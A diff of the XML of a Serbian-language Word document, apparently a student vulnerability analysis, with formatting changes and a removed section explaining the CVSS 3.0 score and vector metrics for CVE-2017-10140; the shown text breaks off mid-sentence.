--- a/Projekat/Selena Milutin- analiza.docx
+++ b/Projekat/Selena Milutin- analiza.docx
@@ -32,7 +32,7 @@
           <w:lang w:val="en"/>
         </w:rPr>
         <w:pict w14:anchorId="6EC5E4DD">
-          <v:rect id="_x0000_i1135" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1025" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -459,7 +459,7 @@
           <w:lang w:val="en"/>
         </w:rPr>
         <w:pict w14:anchorId="38E9DC02">
-          <v:rect id="_x0000_i1136" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1026" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1695,7 +1695,7 @@
           <w:lang w:val="en"/>
         </w:rPr>
         <w:pict w14:anchorId="7EAA1DF4">
-          <v:rect id="_x0000_i1137" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1027" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2231,7 +2231,7 @@
           <w:lang w:val="en"/>
         </w:rPr>
         <w:pict w14:anchorId="3CD93EFF">
-          <v:rect id="_x0000_i1142" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1028" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -2946,21 +2946,7 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>od</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> od </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3100,21 +3086,7 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ne</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> u </w:t>
+        <w:t xml:space="preserve"> (a ne u </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3430,7 +3402,7 @@
           <w:lang w:val="en"/>
         </w:rPr>
         <w:pict w14:anchorId="755281F2">
-          <v:rect id="_x0000_i1143" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1029" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -4332,7 +4304,7 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId7" w:history="1">
+      <w:hyperlink r:id="rId7" w:anchor="cve-cvss-v3" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4458,2583 +4430,3919 @@
           <w:lang w:val="en"/>
         </w:rPr>
         <w:pict w14:anchorId="7950126D">
-          <v:rect id="_x0000_i1144" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1030" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Enumeracija</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> CVE-a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>CVE ID: CVE-2017-10140</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Plugin ID: 104739</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Opis</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:pict w14:anchorId="0FDFE6FF">
-          <v:rect id="_x0000_i1145" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2. CVSS </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>skor</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">CVSS </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>skor</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>numerička</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>vrednost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">): </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>7.8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vektor: CVSS:3.0/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>AV:L</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>AC:L</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>PR:L</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>UI:N</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>S:U</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>/C:H/I:H/A:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>H,  CVSS</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>:3.0/E:P/RL:O/RC:C</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>AV:L</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>napada</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sr-Latn-RS"/>
-        </w:rPr>
-        <w:t>č može biti ulogovan lokalno kako bi izvršio napad ili da se oslanja na iterakciju korisnika.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>AC:L</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>složenost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>napada</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> je low, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>što</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>znači</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>napadač</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>može</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>očekuje</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>svaki</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> put </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>uspešan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>napad</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>na</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ranjivu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>komponentu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>PR:L</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>privilegije</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>napadača</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>su</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> low. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Napadač</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>treba</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ima</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>osnovne</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>privilegije</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>koje</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>inače</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>daju</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>pristup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>sopstvenim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>fajlovima</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>UI:N</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>nije</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>potrebna</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>iterakcija</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>drugog</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>korisnika</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>S:U</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Iskorišćena</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ranjivost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
